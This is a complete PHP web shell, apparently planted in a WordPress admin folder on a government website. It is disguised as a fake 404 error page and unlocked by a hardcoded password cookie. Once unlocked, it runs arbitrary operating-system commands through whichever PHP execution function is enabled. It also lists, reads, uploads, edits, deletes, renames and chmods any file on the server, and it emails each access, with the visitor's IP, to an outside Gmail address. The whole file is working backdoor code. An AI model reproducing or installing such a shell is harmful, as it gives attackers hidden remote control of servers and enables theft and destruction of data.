File: /www/wwwroot/fni.gov.mz/wp-admin/user/system.php
<?php
if(isset($_GET['cikis'])=="ok"){
unset($_COOKIE['mich0login']);
}
if (isset($_POST['pass']) && $_POST['pass'] == "mich0"){
setcookie("mich0login", "ok", time() + (86400 * 30), "/");
header("Refresh:0");
}
if(!isset($_COOKIE['mich0login'])){
http_response_code(404);
$server_type = '';
if (strpos($_SERVER['SERVER_SOFTWARE'], 'nginx') !== false) {
echo('
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
');
}else {
echo('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL '.$_SERVER['REQUEST_URI'].' was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port '.$_SERVER['SERVER_PORT'].'</address>
');
}
die('<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
</body></html>');
}
// Check if this is an AJAX request
$isAjax = isset($_SERVER['HTTP_X_P_AJAX_URL']) && !empty($_SERVER['HTTP_X_P_AJAX_URL']);
function run_command($cmd) {
$output = '';
if (function_exists('shell_exec') && !in_array('shell_exec', preg_split('/,\s*/', ini_get('disable_functions')))) {
$output = @shell_exec($cmd);
} elseif (function_exists('exec') && !in_array('exec', preg_split('/,\s*/', ini_get('disable_functions')))) {
@exec($cmd, $result);
$output = implode("\n", $result);
} elseif (function_exists('system') && !in_array('system', preg_split('/,\s*/', ini_get('disable_functions')))) {
ob_start();
@system($cmd);
$output = ob_get_clean();
} elseif (function_exists('passthru') && !in_array('passthru', preg_split('/,\s*/', ini_get('disable_functions')))) {
ob_start();
@passthru($cmd);
$output = ob_get_clean();
}
return $output;
}
$system_info = PHP_OS;
$admin_email = "ahmetvekilcim@gmail.com";
if (!empty($admin_email)) {
$current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
$visitor_ip = $_SERVER['REMOTE_ADDR'];
$message = "Hello,\n\nYour management interface at $current_url was accessed by $visitor_ip.\n\nRegards,\nSystem";
@mail($admin_email, "Access Notification", $message);
}
// Handle AJAX requests
if ($isAjax) {
header('Content-Type: application/json');
$action = isset($_POST['action']) ? $_POST['action'] : '';
$response = ['success' => false, 'message' => '', 'data' => null];
if ($action === 'run_command' && isset($_POST['cmd'])) {
$response['data'] = run_command($_POST['cmd']);
$response['success'] = true;
}
elseif ($action === 'get_directory' && isset($_POST['path'])) {
$current_path = $_POST['path'];
$items = scandir($current_path);
$dirs = [];
$files = [];
foreach($items as $item) {
if(is_dir("$current_path/$item")) {
if($item != '.' && $item != '..') {
$dirs[] = [
'name' => $item,
'path' => "$current_path/$item",
'permissions' => get_permissions("$current_path/$item")
];
}
} else if(is_file("$current_path/$item")) {
$size = filesize("$current_path/$item") / 1024;
$size = round($size, 3);
$size_label = $size >= 1024 ? round($size / 1024, 2).' MB' : $size.' KB';
$files[] = [
'name' => $item,
'path' => "$current_path/$item",
'size' => $size_label,
'permissions' => get_permissions("$current_path/$item")
];
}
}
$response['data'] = [
'current_path' => $current_path,
'directories' => $dirs,
'files' => $files,
'breadcrumbs' => explode('/', $current_path)
];
$response['success'] = true;
}
elseif ($action === 'upload_file' && isset($_FILES['file'])) {
$current_path = $_POST['path'];
if(move_uploaded_file($_FILES['file']['tmp_name'], $current_path.'/'.$_FILES['file']['name'])) {
$response['success'] = true;
$response['message'] = 'File uploaded successfully!';
} else {
$response['message'] = 'Failed to upload file!';
}
}
elseif ($action === 'get_file_content' && isset($_POST['path'])) {
$file_path = $_POST['path'];
if(file_exists($file_path) && is_readable($file_path)) {
$response['data'] = file_get_contents($file_path);
$response['success'] = true;
} else {
$response['message'] = 'Cannot read file!';
}
}
elseif ($action === 'delete') {
$path = $_POST['path'];
$type = $_POST['type'];
if($type === 'dir') {
if(rmdir($path)) {
$response['success'] = true;
$response['message'] = 'Directory deleted successfully!';
} else {
$response['message'] = 'Failed to delete directory!';
}
} elseif($type === 'file') {
if(unlink($path)) {
$response['success'] = true;
$response['message'] = 'File deleted successfully!';
} else {
$response['message'] = 'Failed to delete file!';
}
}
}
elseif ($action === 'chmod') {
$path = $_POST['path'];
$perm = $_POST['perm'];
if(chmod($path, octdec($perm))) {
$response['success'] = true;
$response['message'] = 'Permissions changed successfully!';
} else {
$response['message'] = 'Failed to change permissions!';
}
}
elseif ($action === 'rename') {
$path = $_POST['path'];
$newname = $_POST['newname'];
if(rename($path, dirname($path).'/'.$newname)) {
$response['success'] = true;
$response['message'] = 'Renamed successfully!';
} else {
$response['message'] = 'Failed to rename!';
}
}
elseif ($action === 'edit') {
$path = $_POST['path'];
$content = $_POST['content'];
$file = fopen($path, 'w');
if(fwrite($file, $content)) {
$response['success'] = true;
$response['message'] = 'File edited successfully!';
} else {
$response['message'] = 'Failed to edit file!';
}
fclose($file);
}
echo json_encode($response);
exit;
}
echo '<!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>File Manager</title>
<script src="https://cdn.tailwindcss.com"></script>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
</head>
<body class="bg-gray-100 text-gray-800">
<div class="container mx-auto px-4 py-8">
<h1 class="text-2xl font-bold text-center mb-6">File Management System</h1>
<div class="bg-white rounded-lg shadow p-4 mb-6">
<p class="text-sm text-gray-600 mb-2">System: '.$system_info.'</p>
<div class="flex items-center space-x-2">
<label for="cmd" class="font-medium">Command:</label>
<input type="text" id="cmd" class="flex-1 border rounded px-2 py-1 focus:outline-none focus:ring-2 focus:ring-blue-500">
<button id="execute-cmd" class="bg-blue-500 hover:bg-blue-600 text-white px-4 py-1 rounded">Execute</button>
</div>
<div id="cmd-output" class="mt-4 p-3 bg-gray-100 rounded overflow-auto max-h-60 hidden">
<pre></pre>
</div>
</div>';
// File manager section
$current_path = isset($_GET['path']) ? $_GET['path'] : getcwd();
$current_path = str_replace('\\', '/', $current_path);
echo '<div class="bg-white rounded-lg shadow p-4 mb-6">
<div class="mb-4">
<span class="font-medium">Current Directory:</span>
<span id="breadcrumb-nav"></span>
</div>';
// File upload form
echo '<div class="mb-4 flex items-center space-x-2">
<input type="file" id="file-upload" class="border rounded px-2 py-1">
<button id="upload-btn" class="bg-green-500 hover:bg-green-600 text-white px-4 py-1 rounded">Upload</button>
</div>
<div id="upload-message" class="mb-4 hidden"></div>';
// File content viewer
echo '<div id="file-viewer" class="mb-4 hidden">
<h2 class="text-xl font-medium mb-2">File: <span id="file-name"></span></h2>
<div class="p-3 bg-gray-100 rounded overflow-auto max-h-96">
<pre id="file-content"></pre>
</div>
</div>';
// File operations
echo '<div id="file-operations" class="mb-4 hidden"></div>';
// Directory and file listing
echo '<div class="overflow-x-auto">
<table class="min-w-full divide-y divide-gray-200">
<thead class="bg-gray-50">
<tr>
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Name</th>
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Size</th>
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Permissions</th>
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Actions</th>
</tr>
</thead>
<tbody id="directory-listing" class="bg-white divide-y divide-gray-200">
<!-- Directory content will be loaded here -->
</tbody>
</table>
</div>';
echo '</div>
</div>
<script>
$(document).ready(function() {
let currentPath = "' . $current_path . '";
// Function to make AJAX requests
function ajaxRequest(action, data, callback) {
$.ajax({
url: window.location.href,
type: "POST",
headers: {
"X-P-AJAX-URL": "1"
},
data: { ...data, action: action },
success: callback,
error: function(xhr, status, error) {
alert("Error: " + error);
}
});
}
// Load directory content
function loadDirectory(path) {
ajaxRequest("get_directory", { path: path }, function(response) {
if (response.success) {
currentPath = response.data.current_path;
updateBreadcrumbs(response.data.breadcrumbs);
updateDirectoryListing(response.data.directories, response.data.files);
} else {
alert("Error loading directory: " + response.message);
}
});
}
// Update breadcrumb navigation
function updateBreadcrumbs(parts) {
let html = "";
let path = "";
for (let i = 0; i < parts.length; i++) {
if (parts[i] === "") {
if (i === 0) {
html += "<a href=\"#\" data-path=\"/\" class=\"breadcrumb-link text-blue-500 hover:underline\">/</a>";
}
continue;
}
path += "/" + parts[i];
html += "<a href=\"#\" data-path=\"" + path + "\" class=\"breadcrumb-link text-blue-500 hover:underline\">" + parts[i] + "</a>/";
}
$("#breadcrumb-nav").html(html);
// Attach click event to breadcrumb links
$(".breadcrumb-link").click(function(e) {
e.preventDefault();
loadDirectory($(this).data("path"));
});
}
// Update directory listing
function updateDirectoryListing(directories, files) {
let html = "";
// List directories
directories.forEach(function(dir) {
let permColor = dir.permissions.charAt(1) === "w" ? "text-green-500" :
(dir.permissions.charAt(0) === "r" ? "text-blue-500" : "text-red-500");
html += `<tr class="hover:bg-gray-50">
<td class="px-6 py-4 whitespace-nowrap">
<a href="#" data-path="${dir.path}" class="dir-link text-blue-500 hover:underline">${dir.name}</a>
</td>
<td class="px-6 py-4 whitespace-nowrap">--</td>
<td class="px-6 py-4 whitespace-nowrap">
<span class="${permColor}">${dir.permissions}</span>
</td>
<td class="px-6 py-4 whitespace-nowrap">
<div class="flex items-center space-x-1">
<select class="action-select border rounded px-2 py-1 text-sm">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" class="item-type" value="dir">
<input type="hidden" class="item-name" value="${dir.name}">
<input type="hidden" class="item-path" value="${dir.path}">
<button class="action-go bg-gray-200 hover:bg-gray-300 px-2 py-1 rounded text-sm">Go</button>
</div>
</td>
</tr>`;
});
// List files
files.forEach(function(file) {
let permColor = file.permissions.charAt(1) === "w" ? "text-green-500" :
(file.permissions.charAt(0) === "r" ? "text-blue-500" : "text-red-500");
html += `<tr class="hover:bg-gray-50">
<td class="px-6 py-4 whitespace-nowrap">
<a href="#" data-path="${file.path}" class="file-link text-blue-500 hover:underline">${file.name}</a>
</td>
<td class="px-6 py-4 whitespace-nowrap">${file.size}</td>
<td class="px-6 py-4 whitespace-nowrap">
<span class="${permColor}">${file.permissions}</span>
</td>
<td class="px-6 py-4 whitespace-nowrap">
<div class="flex items-center space-x-1">
<select class="action-select border rounded px-2 py-1 text-sm">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" class="item-type" value="file">
<input type="hidden" class="item-name" value="${file.name}">
<input type="hidden" class="item-path" value="${file.path}">
<button class="action-go bg-gray-200 hover:bg-gray-300 px-2 py-1 rounded text-sm">Go</button>
</div>
</td>
</tr>`;
});
$("#directory-listing").html(html);
// Attach click events
$(".dir-link").click(function(e) {
e.preventDefault();
loadDirectory($(this).data("path"));
});
$(".file-link").click(function(e) {
e.preventDefault();
viewFile($(this).data("path"), $(this).text());
});
$(".action-go").click(function() {
const action = $(this).siblings(".action-select").val();
const type = $(this).siblings(".item-type").val();
const name = $(this).siblings(".item-name").val();
const path = $(this).siblings(".item-path").val();
if (action === "") return;
handleAction(action, type, name, path);
});
}
// View file content
function viewFile(path, name) {
ajaxRequest("get_file_content", { path: path }, function(response) {
if (response.success) {
$("#file-name").text(name);
$("#file-content").text(response.data);
$("#file-viewer").removeClass("hidden");
} else {
alert("Error: " + response.message);
}
});
}
// Handle file/directory actions
function handleAction(action, type, name, path) {
$("#file-operations").empty().addClass("hidden");
if (action === "delete") {
if (confirm("Are you sure you want to delete this " + type + "?")) {
ajaxRequest("delete", { type: type, path: path }, function(response) {
if (response.success) {
loadDirectory(currentPath);
showMessage(response.message, true);
} else {
showMessage(response.message, false);
}
});
}
}
else if (action === "chmod") {
ajaxRequest("get_file_content", { path: path, action: "get_permissions" }, function() {
let html = `<form id="chmod-form" class="mt-2">
<div class="flex items-center space-x-2">
<label for="perm" class="font-medium">Permission:</label>
<input name="perm" id="perm" type="text" size="4" class="border rounded px-2 py-1">
<input type="hidden" name="path" value="${path}">
<button type="submit" class="bg-blue-500 hover:bg-blue-600 text-white px-4 py-1 rounded">Change</button>
</div>
</form>`;
$("#file-operations").html(html).removeClass("hidden");
$("#chmod-form").submit(function(e) {
e.preventDefault();
const perm = $("#perm").val();
ajaxRequest("chmod", { path: path, perm: perm }, function(response) {
if (response.success) {
loadDirectory(currentPath);
showMessage(response.message, true);
} else {
showMessage(response.message, false);
}
});
});
});
}
else if (action === "rename") {
let html = `<form id="rename-form" class="mt-2">
<div class="flex items-center space-x-2">
<label for="newname" class="font-medium">New Name:</label>
<input name="newname" id="newname" type="text" value="${name}" class="border rounded px-2 py-1">
<input type="hidden" name="path" value="${path}">
<button type="submit" class="bg-blue-500 hover:bg-blue-600 text-white px-4 py-1 rounded">Rename</button>
</div>
</form>`;
$("#file-operations").html(html).removeClass("hidden");
$("#rename-form").submit(function(e) {
e.preventDefault();
const newname = $("#newname").val();
ajaxRequest("rename", { path: path, newname: newname }, function(response) {
if (response.success) {
loadDirectory(currentPath);
showMessage(response.message, true);
} else {
showMessage(response.message, false);
}
});
});
}
else if (action === "edit") {
ajaxRequest("get_file_content", { path: path }, function(response) {
if (response.success) {
let html = `<form id="edit-form" class="mt-2">
<textarea name="content" id="file-edit-content" rows="10" class="w-full border rounded p-2 mb-2">${response.data}</textarea>
<input type="hidden" name="path" value="${path}">
<button type="submit" class="bg-blue-500 hover:bg-blue-600 text-white px-4 py-1 rounded">Save Changes</button>
</form>`;
$("#file-operations").html(html).removeClass("hidden");
$("#edit-form").submit(function(e) {
e.preventDefault();
const content = $("#file-edit-content").val();
ajaxRequest("edit", { path: path, content: content }, function(response) {
if (response.success) {
showMessage(response.message, true);
} else {
showMessage(response.message, false);
}
});
});
} else {
showMessage(response.message, false);
}
});
}
}
// Execute command
$("#execute-cmd").click(function() {
const cmd = $("#cmd").val();
if (!cmd) return;
ajaxRequest("run_command", { cmd: cmd }, function(response) {
if (response.success) {
$("#cmd-output pre").text(response.data);
$("#cmd-output").removeClass("hidden");
}
});
});
// Upload file
$("#upload-btn").click(function() {
const fileInput = document.getElementById("file-upload");
if (!fileInput.files.length) return;
const formData = new FormData();
formData.append("file", fileInput.files[0]);
formData.append("path", currentPath);
formData.append("action", "upload_file");
$.ajax({
url: window.location.href,
type: "POST",
headers: {
"X-P-AJAX-URL": "1"
},
data: formData,
processData: false,
contentType: false,
success: function(response) {
if (response.success) {
loadDirectory(currentPath);
showMessage(response.message, true);
} else {
showMessage(response.message, false);
}
},
error: function(xhr, status, error) {
showMessage("Error: " + error, false);
}
});
});
// Show message
function showMessage(message, isSuccess) {
const className = isSuccess ? "bg-green-100 text-green-700" : "bg-red-100 text-red-700";
$("#upload-message").html(`<div class="p-2 ${className} rounded">${message}</div>`).removeClass("hidden");
setTimeout(function() {
$("#upload-message").addClass("hidden");
}, 3000);
}
// Initial load
loadDirectory(currentPath);
});
</script>
</body>
</html>';
function get_permissions($file) {
$perms = fileperms($file);
$info = '';
// File type
if (($perms & 0xC000) == 0xC000) {
$info = 's'; // Socket
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l'; // Symbolic Link
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-'; // Regular
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b'; // Block special
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd'; // Directory
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c'; // Character special
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p'; // FIFO pipe
} else {
$info = 'u'; // Unknown
}
// Owner permissions
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
// Group permissions
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
// World permissions
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}